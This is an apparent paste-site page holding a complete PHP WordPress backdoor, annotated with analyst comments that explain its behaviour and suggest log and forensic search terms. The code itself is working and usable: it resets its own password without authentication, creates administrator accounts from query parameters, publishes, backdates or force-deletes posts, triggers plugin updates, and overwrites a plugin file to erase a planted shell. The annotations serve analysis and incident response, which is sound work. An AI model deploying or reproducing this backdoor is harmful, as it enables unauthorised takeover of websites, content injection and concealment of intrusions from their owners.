tomve

WP malware! script for add admin

Aug 15th, 2018
  1. <?php
     // Analyst note: this file is a password-gated WordPress backdoor. Once the
     // cookie check further down passes, it loads wp-load.php and calls
     // WordPress and PHP APIs directly (wp_insert_user, wp_insert_post,
     // wp_update_post, wp_delete_post, wp_update_plugin, file_put_contents).
     // The only access control in the file is its own password/cookie gate;
     // no WordPress login, capability check or nonce is involved.
  2. //Don't try this at home
  3.  
  4. header('Content-Type:text/html; charset=UTF-8');
  5.  
     // '@' hides the warning PHP raises if set_time_limit() is not permitted.
  6. @set_time_limit(0);
  7.  
     // Relative name: the hash file is opened relative to the working directory
     // (presumably the script's own directory under a web SAPI; confirm on the
     // host). A stray p.txt holding a single 32-character hex string next to an
     // unknown PHP file is an artefact worth searching for during triage.
  8. define('PASSWORD_FILE', 'p.txt');
  9.  
      // This branch sits above every password/cookie check in the file, so it is
      // reachable without authentication: any client that can request the script
      // can replace the stored hash. The value is written exactly as received
      // (no length or format validation) and travels in the query string, so it
      // is normally recorded in the web server's access log. Requests carrying
      // action=set_password are a useful log search term.
  10. if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {
  11.     $hashed_password = $_GET['hashed_password'];
  12.     $fh = fopen(PASSWORD_FILE, "w");
  13.     if($fh==false) die("unable to create file");
  14.     fputs ($fh, $hashed_password);
  15.     fclose ($fh);
  16.     exit;
  17. }
  18.  
      // First run (no hash file yet): the hard-coded default hash is written to
      // PASSWORD_FILE. On later runs the stored value is read back and trimmed,
      // so the file on disk, not this literal, decides which password works.
  19. if(!file_exists(PASSWORD_FILE)) {
  20.     $hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
  21.     $fh = fopen(PASSWORD_FILE, "w");
  22.     if($fh==false) die("unable to create file");
  23.     fputs ($fh, $hashed_password);
  24.     fclose ($fh);
  25. }
  26. else {
  27.     $hashed_password = trim(file_get_contents(PASSWORD_FILE));
  28. }
  29.  
      // SHELL_PASSWORD holds the hash, never a plaintext password; the login
      // code compares it with md5() of the submitted value and with the cookie.
  30. define('SHELL_PASSWORD', $hashed_password);
      // Upper bound on how many directories are probed when locating wp-load.php.
  31. define('MAX_UP_LEVELS', 10);
  32.  
      // Login form: shown when neither a cookie nor a POSTed password is present,
      // or when the POSTed password's MD5 does not match. This branch does not
      // exit; the cookie check at the end of this section is what stops the
      // request. All comparisons here use loose ==/!= on strings.
  33. if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
  34.     print '<form method="post">Password : <input type="text" name="password"><input type="submit"></form>';
  35. }
  36.  
      // Successful login: a cookie named "password" is set to the stored hash
      // itself for 24 hours, with no further setcookie() arguments, then the
      // client is redirected to the same script. The hash therefore acts as the
      // session credential: disclosure of the hash file or of a log line
      // containing it is equivalent to disclosure of the password. In HTTP logs
      // the login appears as a POST to the script answered by a redirect to the
      // same path.
  37. if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
  38.     setcookie('password', SHELL_PASSWORD, time()+60*60*24);
  39.     header("Location: {$_SERVER['PHP_SELF']}");
  40.     exit;
  41. }
  42.  
      // Gate for everything below: no cookie, or a cookie that differs from the
      // stored hash, ends the request here.
  43. if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
  44.     exit;
  45. }
  46.  
      // Locate the WordPress bootstrap: probe ./wp-load.php, then ../wp-load.php
      // and so on, for at most MAX_UP_LEVELS attempts. The first hit is
      // require()d, which loads WordPress in-process. $dir_up keeps the relative
      // prefix that worked and is reused later for the wp-admin includes.
      // If nothing is found the loop simply ends; the WordPress calls further
      // down would then fail as undefined functions.
  47. $counter = 0;
  48. $dir_up = './';
  49. do {
  50.     $file_found = false;
  51.     $file_path = "{$dir_up}wp-load.php";
  52.     if(file_exists($file_path)) {
  53.         require($file_path);
  54.         $file_found = true;
  55.     }
  56.     else {
  57.         $dir_up .= '../';
  58.     }
  59.     $counter++;
  60. }while(!$file_found && $counter < MAX_UP_LEVELS);
  61.  
      // Rogue administrator creation. username, password and email come from the
      // query string and are passed to wp_insert_user() with the role fixed to
      // 'administrator'. Nothing in this script checks a WordPress capability or
      // nonce before the call; the cookie gate above is the only control.
      // Triage pointers: because the parameters are sent via GET, the chosen
      // login, password and e-mail normally appear in the access log on the
      // action=create_user request; compare those hits with administrator
      // accounts in the users table and their registration time.
      // The success message echoes the GET values into the page without escaping.
  62. if(isset($_GET['action']) && $_GET['action'] == 'create_user') {
  63. if(empty($_GET['username']) || empty($_GET['password']) || empty($_GET['email'])){
  64. print "Missing parameter for creating user!";
  65. exit;
  66. }
  67. else {
  68. $userdata = array('user_login' => $_GET['username'], 'user_pass' => $_GET['password'], 'user_email' => $_GET['email'], 'role' => 'administrator');
  69. $user_id = wp_insert_user( $userdata );
      // wp_insert_user() yields a numeric ID on success; a non-numeric result
      // (error object) is silently ignored here.
  70. if(is_numeric($user_id)) {
  71. print "User has been created.<br>Login: {$_GET['username']} Password: {$_GET['password']}<br>";
  72. print '<a href="'.wp_login_url().'" title="Login" target="_blank">Login</a><br>';
  73. }
  74. }
  75. }
  76.  
      // Content injection: insert, update or permanently delete a post or page
      // from POSTed fields. The post is published immediately and attributed to
      // user ID 1 regardless of who is operating the script.
  77. if(!empty($_POST['title']) && !empty($_POST['post'])) {
      // The date is operator-supplied and the time of day is randomised, so the
      // stored post_date need not reflect when the content was really written.
      // During review, a post ID that is out of sequence with its post_date is
      // worth a closer look.
  78.     $post_date = $_POST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);
  79.  
  80.     // Create post object
  81.     $my_post = array(
  82.       'post_title'    => $_POST['title'],
  83.       'post_content'  => $_POST['post'],
  84.       'post_status'   => 'publish',
  85.       'post_author'   => 1,
  86.       'post_type' => $_POST['post_type'],
  87.       'post_date'     => $post_date
  88.     );
  89.     $id = NULL;
  90.     if(empty($_POST['ID'])) {
  91.         // Insert the post into the database
  92.         $id = wp_insert_post($my_post);
  93.     }
  94.     else {
  95.             if($_POST['delete_post'] == 1) {
                  // Second argument true is passed as wp_delete_post()'s
                  // force-delete flag, i.e. the post is not moved to trash.
  96.                 $del_op_res = wp_delete_post( $_POST['ID'], true );
  97.                 if(!$del_op_res) print "Delete failed!<br>\n";
  98.             }
  99.             else {
  100.                 $my_post['ID'] = $_POST['ID'];
  101.                 $id = wp_update_post($my_post);
  102.             }
  103.     }
        // On the delete path $id is still NULL when these two calls run.
  104.     $permalink = get_permalink( $id );
  105.     wp_set_post_categories($id, array($_POST['cat']));
  106.     if($_POST['delete_post'] != 1) {
  107.         if(!empty($id)) {
  108.             $post = get_post($id);
  109.             print "<a href=\"{$permalink}\" target=\"blank\">View post by permalink</a>&nbsp;<a href=\"{$post->guid}\" target=\"blank\">View post/page by id</a>";
  110.         }
  111.         else {
  112.             print "Action failed!<br>\n";
  113.         }
  114.     }
  115. }
  116.  
       // Plugin update trigger: loads the wp-admin helper files through the
       // relative prefix found while locating wp-load.php, then calls
       // wp_update_plugin() once per POSTed plugin identifier. The identifiers
       // are taken from the request as-is and echoed back without escaping.
       // The request ends here, so the HTML interface below is not rendered.
  117. if(!empty($_POST['plugin2update'])) {
  118.     include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
  119.     include_once( $dir_up . 'wp-admin/includes/update.php');
  120.     include_once( $dir_up . 'wp-admin/includes/file.php');
  121.     include_once( $dir_up . 'wp-admin/includes/screen.php');
  122.     include_once( $dir_up . 'wp-admin/includes/misc.php');
  123.     include_once( $dir_up . 'wp-admin/includes/plugin.php');
  124.    
  125.     foreach($_POST['plugin2update'] as $plugin) {
  126.         print "$plugin update : ";
  127.         wp_update_plugin($plugin);
  128.     }
  129.    
  130.     exit;
  131. }
  132.  
       // File overwrite ("Remove shell from file" in the interface below): the
       // POSTed path is overwritten with the plugin source held in the string
       // literal that follows. The literal looks like an ordinary "Tell a
       // Friend" plugin body; presumably the intent is to replace a previously
       // modified copy of that plugin with clean-looking code, which would also
       // erase evidence in that file (inferred from the label, not shown here).
       // For forensics, the target file's modification time changes on this
       // request even though its new content looks benign.
  133. if(!empty($_POST['file2clean'])) {
  134. $tell_a_friend_content = '<?php
  135. /*
  136. Plugin Name: Tell a Friend
  137. Version: 0.1
  138. Plugin URI: http://www.freetellafriend.com/get_button/
  139. Description: Adds a \'Share This Post\' button after each post. The service which is used is freetellafriend.com which supports e-mail address book, social bookmarks and favorites.
  140. Author: FreeTellaFriend
  141. Author URI: http://www.freetellafriend.com/
  142. */
  143.  
  144. function tell_a_friend($content) {
  145. global $post;
  146. $taf_permlink = urlencode(get_permalink($post->ID));
  147. $taf_title = urlencode(get_the_title($post->ID) );
  148. $taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';
  149.  
  150.     if ( !is_feed() && !is_page() ) {
  151.     $content .= \'<a href="https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'" onclick="window.open(\'https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'\', \'freetellafriend\', \'scrollbars=1,menubar=0,width=617,height=530,resizable=1,toolbar=0,location=0,status=0,screenX=210,screenY=100,left=210,top=100\'); return false;" target="_blank" title="Share This Post"><img src="\'.$taf_img.\'" style="width:127px;height:16px;border:0px;" alt="Share This Post" title="Share This Post" /></a>\';               
  152.     }
  153.  
  154. return $content;
  155. }
  156.  
  157. add_filter(\'the_content\', \'tell_a_friend\');
  158.  
  159. ?>';
  160.  
       // The path comes straight from the request. The only conditions are that
       // it exists and contains the substring 'tell-a-friend.php'; it is not
       // resolved or compared against the plugin directory. The path is also
       // echoed back into the page without escaping.
  161.     if(file_exists($_POST['file2clean'])) {
  162.         if(strpos($_POST['file2clean'], 'tell-a-friend.php') !== false) {
  163.             if(file_put_contents($_POST['file2clean'], $tell_a_friend_content)) {
  164.                 print "File {$_POST['file2clean']} has been cleaned.";
  165.             }
  166.             else {
  167.                 print "Failed cleaning {$_POST['file2clean']} !";
  168.             }
  169.         }
  170.     }
  171. }
  172. ?>
  173. <html lang="en">
  174. <head>
  175.   <meta charset="utf-8" />
  176.   <title>WP posts editor</title>
  177.   <link rel="stylesheet" href="http://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css" />
  178.   <script src="http://code.jquery.com/jquery-1.9.1.js"></script>
  179.   <script src="http://code.jquery.com/ui/1.10.3/jquery-ui.js"></script>
  180.   <link rel="stylesheet" href="/resources/demos/style.css" />
  181.   <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script>
  182.   <script>
  183.   tinymce.init({
  184.   selector: 'textarea',
  185.   height: 500,
  186.   theme: 'modern',
  187.   plugins: [
  188.     'advlist autolink lists link image charmap print preview hr anchor pagebreak',
  189.     'searchreplace wordcount visualblocks visualchars code',
  190.     'insertdatetime media nonbreaking save table contextmenu directionality',
  191.     'paste textcolor colorpicker textpattern imagetools codesample toc help'
  192.   ],
  193.   toolbar1: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image',
  194.   toolbar2: 'print preview media | forecolor backcolor | codesample help',
  195.   image_advtab: true,
  196.   content_css: [
  197.     '//fonts.googleapis.com/css?family=Lato:300,300i,400,400i',
  198.     '//www.tinymce.com/css/codepen.min.css'
  199.   ]
  200.  });
  201.   </script>
  202.   <script>
  203.   $(function() {
  204.     $( "#datepicker" ).datepicker({
  205.       changeMonth: true,
  206.       changeYear: true,
  207.       dateFormat: "yy-mm-dd"
  208.     });
  209.   });
  210.  
  211.   function go(form_obj) {
         // Submits the plugin form once per checkbox. Each checkbox is
         // temporarily enabled and checked, the form is posted to its own
         // window target ("window" + element index), and the checkbox is then
         // disabled and unchecked again so the next submission carries only one
         // plugin. In server logs this appears as a burst of POSTs to the
         // script, one per installed plugin.
  212.     for(var i=0;i<form_obj.elements.length;i++) {
  213.         if(form_obj.elements[i].type == "checkbox") {
  214.             form_obj.elements[i].disabled = false;
  215.             form_obj.elements[i].checked = true;
  216.             form_obj.target = "window" + i;
  217.             form_obj.submit();
  218.             form_obj.elements[i].disabled = true;
  219.             form_obj.elements[i].checked = false;
  220.         }
  221.     }
  222.   }
  223.   </script>
  224. </head>
  225. <body>
  226. <?php print $message; ?>
  227. <form method="post">
  228. <fieldset legend="Update plugins">
  229. <?php
       // Lists every installed plugin (the keys returned by get_plugins()) as a
       // disabled checkbox; the page's go() script enables them one at a time
       // when submitting. The plugin identifiers are written into the HTML
       // without escaping. $counter is incremented here but not read again in
       // the visible code.
  230.     include_once($dir_up . 'wp-admin/includes/plugin.php');
  231.        
  232.     $plugins = get_plugins();
  233.     foreach (array_keys($plugins)  as $plugin ) {
  234.         echo "<li><input type=\"checkbox\" name=\"plugin2update[]\" value=\"$plugin\" disabled>$plugin</li>\n";
  235.         $counter++;
  236.     }
  237. ?>
  238. <input type="button" value="Update plugins" onclick="go(this.form)">
  239. </fieldset>
  240. </form>
  241.  
  242. <form method="post">
  243. <fieldset>
  244. Remove shell from file : <select name="file2clean">
  245. <option value="<?php print $dir_up . 'wp-content/plugins/tell-a-friend/tell-a-friend.php'; ?>">tell-a-friend.php</option>
  246. </select>
  247. <input type="submit">
  248. </fieldset>
  249. </form>
  250.  
  251. <form>
  252. <fieldset legend="Create user">
  253. Username: <input type="text" name="username"><br>
  254. Password: <input type="text" name="password"><br>
  255. E-mail: <input type="text" name="email"><br>
  256. <input type="hidden" name="action" value="create_user">
  257. <input type="submit" value="Create user">
  258. </fieldset>
  259. </form>
  260. <hr>
  261. <h1>Add/Edit posts</h1>
  262. <?php
       // Pre-fills the edit form. A post can be selected in two ways, both from
       // the query string: by slug (post_url2search with every '/' removed,
       // matched against published posts, first result only) or by page_id.
       // When both are present the page_id lookup runs last and wins.
  263. $post = NULL;
  264. if(!empty($_GET['post_url2search'])) {
  265.     $the_slug = str_replace('/', '', $_GET['post_url2search']);
  266.     $args = array(
  267.         'name' => $the_slug,
  268.         'post_status' => 'publish',
  269.         'posts_per_page' => 1
  270.     );
  271.     $my_posts = get_posts( $args );
  272.  
  273.     if(!empty($my_posts[0]->ID) && is_numeric($my_posts[0]->ID)) {
  274.         $post = get_post($my_posts[0]->ID);
  275.     }
  276. }
  277.  
       // page_id is passed to get_page() as received, without an integer cast.
  278. if(!empty($_GET['page_id'])) {
  279.     $post = get_page($_GET['page_id']);
  280. }
  281. ?>
  282.  
  283. <form method="post" action="<?php print $_SERVER['PHP_SELF']; ?>">
  284. Title: <input type="text" name="title" size="100" value="<?php if(!empty($post->post_title)) print $post->post_title; ?>">
  285. <br>
  286. Post: <textarea name="post" rows="30" cols="100"><?php if(!empty($post->post_content)) print $post->post_content; ?></textarea>
  287. <br>
  288. Date: <input type="text" name="datepicker" id="datepicker" value="<?php if(!empty($post->post_date)) print $post->post_date; ?>">
  289. <br>
  290. Category: <?php
       // Chooses the category pre-selected in the dropdown: the first category
       // of the post found by the slug search, or 0 when no such post exists.
       // A post loaded via page_id does not set $my_posts, so it falls to 0.
       // array_shift() takes its argument by reference, so passing a function
       // result directly makes PHP raise a notice here.
  291. if(!empty($my_posts[0]->ID)) {
  292.     $sel_cat = array_shift(wp_get_post_categories($my_posts[0]->ID));
  293. }
  294. else {
  295.     $sel_cat = 0;
  296. }
  297.  
       // Arguments for wp_dropdown_categories(): 'echo' => 1 makes it print the
       // <select> directly, and 'name' => 'cat' is the field the post handler
       // reads as $_POST['cat'].
  298. $args = array(
  299.     'show_option_all'    => '',
  300.     'show_option_none'   => '',
  301.     'orderby'            => 'ID',
  302.     'order'              => 'ASC',
  303.     'show_count'         => 1,
  304.     'hide_empty'         => 1,
  305.     'child_of'           => 0,
  306.     'exclude'            => '',
  307.     'echo'               => 1,
  308.     'selected'           => $sel_cat,
  309.     'hierarchical'       => 0,
  310.     'name'               => 'cat',
  311.     'id'                 => '',
  312.     'class'              => 'postform',
  313.     'depth'              => 0,
  314.     'tab_index'          => 0,
  315.     'taxonomy'           => 'category',
  316.     'hide_if_empty'      => false,
  317.     'walker'             => ''
  318. );
  319. wp_dropdown_categories( $args );
  320. ?>
  321. Post type: <input type="radio" name="post_type" value="post" <?php if((!empty($post->post_type) && $post->post_type == 'post') || (empty($post->post_type))) print 'checked'; ?>>Post
  322. <input type="radio" name="post_type" value="page" <?php if(!empty($post->post_type) && $post->post_type == 'page') print 'checked'; ?>>Page<br>
  323. <input type="hidden" name="ID" value="<?php if(!empty($post->ID)) print $post->ID; ?>">
  324. <input type="submit" value="Insert/Update post">
  325. <input type="hidden" name="delete_post" value="">
  326. <input type="button" value="Delete post" onclick="if(confirm('Delete this post?')) {this.form.delete_post.value=1;this.form.submit();}">
  327. </form>
  328.  
  329. <br>
  330. <hr>
  331. <h1>Edit posts</h1>
  332. <br>
  333. <form method="get">
  334. Post URL : <input type="text" name="post_url2search" size="100">
  335. <input type="submit" value="FIND AND EDIT">
  336. </form>
  337.  
  338. <form method="get">
  339. Edit page: <?php wp_dropdown_pages(); ?>
  340. <input type="submit">
  341. </form>
  342.  
  343.  
  344. <br><br><br>
  345. Categories view:<br>
  346. <?php
       // Read-only overview: fetches the non-empty categories of the 'category'
       // taxonomy, ordered by name, and prints one link per category built as
       // <site URL>/category/<slug>. The slug and name are written into the HTML
       // without escaping.
  347. $args = array(
  348.     'type'                     => 'post',
  349.     'child_of'                 => 0,
  350.     'parent'                   => '',
  351.     'orderby'                  => 'name',
  352.     'order'                    => 'ASC',
  353.     'hide_empty'               => 1,
  354.     'hierarchical'             => 1,
  355.     'exclude'                  => '',
  356.     'include'                  => '',
  357.     'number'                   => '',
  358.     'taxonomy'                 => 'category',
  359.     'pad_counts'               => false );
  360.  
  361. $categories = get_categories( $args );
  362. foreach ($categories as $category) {
  363.     echo "<a href=\"".get_site_url()."/category/{$category->slug}\" target=\"_blank\">{$category->cat_name}</a><br>\n";
  364. }
  365. ?>
  366. </body>
  367. </html>